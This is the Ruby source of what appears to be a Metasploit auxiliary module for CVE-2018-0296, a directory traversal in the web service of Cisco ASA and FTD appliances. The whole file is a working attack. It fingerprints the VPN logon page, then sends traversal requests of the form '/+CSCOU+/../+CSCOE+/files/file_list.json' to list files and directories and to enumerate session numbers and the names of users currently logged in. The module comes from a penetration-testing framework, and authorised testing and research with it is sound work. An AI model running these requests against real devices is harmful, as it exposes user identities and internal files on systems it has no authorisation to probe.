rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
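# Auxiliary module for CVE-2018-0296, a directory traversal in the web service
# of Cisco ASA and FTD software. It sends plain GET requests (this module sets
# no credentials) for three file-listing paths and prints whatever the device
# returns, including the user entries found under the sessions listing.
class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and its datastore options.
  #
  # @param info [Hash] metadata supplied by the framework, merged through
  #   update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco ASA Directory Traversal',
        'Description' => %q{
          This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.
          It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.
        },
        'Author' => [
          'Michał Bentkowski', # Discovery
          'Yassine Aboukir', # PoC
          'Shelby Pace' # Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2018-0296' ],
          [ 'EDB', '44956' ]
        ],
        'DisclosureDate' => '2018-06-06',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # TLS on port 443 is the default transport for this module.
    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
        Opt::RPORT(443)
      ]
    )
  end

  # Checks whether the target answers like a Cisco SSL VPN web portal.
  #
  # Requests `+CSCOE+/logon.html` under TARGETURI and looks for any of four
  # marker strings in the response body. A true result only shows that the
  # logon page is reachable; this check does not test for the vulnerability.
  #
  # @return [Boolean] true when a response arrived and its body contains at
  #   least one marker
  def is_accessible?
    uri = normalize_uri(target_uri.path, '+CSCOE+/logon.html')

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => uri
    )
    # No response object means there is no body to inspect.
    return false unless res

    portal_markers = ['SSL VPN Service', '+CSCOE+', '+webvpn+', 'webvpnlogin']
    portal_markers.any? { |marker| res.body.include?(marker) }
  end

  # Requests one listing path and prints the result.
  #
  # A 200 response whose body contains `///sessions` is handed to
  # get_sessions; any other 200 body is printed as-is. A missing response or a
  # non-200 status is reported instead of being dropped silently, so a run that
  # returns nothing is visible in the output.
  #
  # @param path [String] listing path, joined onto TARGETURI
  # @return [void]
  def list_files(path)
    uri = normalize_uri(target_uri.path, path)

    list_res = send_request_cgi(
      'method' => 'GET',
      'uri' => uri
    )

    unless list_res
      print_error("No response for #{uri}")
      return
    end

    # NOTE(review): a non-200 status only shows the listing was not served;
    # this code cannot tell whether that means the device is patched.
    unless list_res.code == 200
      print_status("No listing returned for #{uri} (HTTP #{list_res.code})")
      return
    end

    if list_res.body.match?(%r{/{3}sessions})
      get_sessions(list_res.body)
    else
      print_good(list_res.body)
    end
  end

  # Extracts candidate session numbers from a sessions listing and, when any
  # are found, prints the listing and looks up the user behind each one.
  #
  # @param response [String] body of the sessions listing response
  # @return [void]
  def get_sessions(response)
    # Every run of two or more digits is taken as a session number, so other
    # numbers in the body would be requested too.
    # NOTE(review): confirm against the real listing format.
    # No capture group here, so scan yields flat strings rather than
    # one-element arrays.
    session_nos = response.scan(/[0-9]{2,}/)

    if session_nos.empty?
      print_status('Could not detect any sessions')
      print("\n")
      return
    end

    print_good(response)
    list_users(session_nos)
  end

  # Requests the listing for each session number and prints the user entries
  # found in the responses.
  #
  # @param sessions [Array] session numbers to look up
  # @return [void]
  def list_users(sessions)
    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
    user_ids = []

    sessions.each do |session_no|
      users_res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, sessions_uri, session_no)
      )
      next unless users_res && users_res.body.include?('name')

      # String#[] returns the whole "user:<name>" match, or nil when the body
      # has no such token. Skipping nil keeps blank entries out of the report;
      # the previous `match(...).to_s` recorded an empty string in that case.
      user_entry = users_res.body[/user:\w+/]
      user_ids.push(user_entry) if user_entry
    end

    if user_ids.empty?
      print_status('There are no users logged in currently')
      return
    end

    print_status('Users logged in:')
    user_ids.each { |id| print_good(id) }
    print("\n")
  end

  # Module entry point: confirms the portal is reachable, then requests the
  # root, sessions and +CSCOE+ listings in that order.
  #
  # Every request path below contains the literal
  # `/+CSCOU+/../+CSCOE+/files/file_list.json`, which makes this module's
  # traffic straightforward to search for in web or proxy logs.
  #
  # @return [void]
  def run
    file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'
    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
    cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'

    fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service') unless is_accessible?

    [file_uri, sessions_uri, cscoe_uri].each { |path| list_files(path) }
  end
end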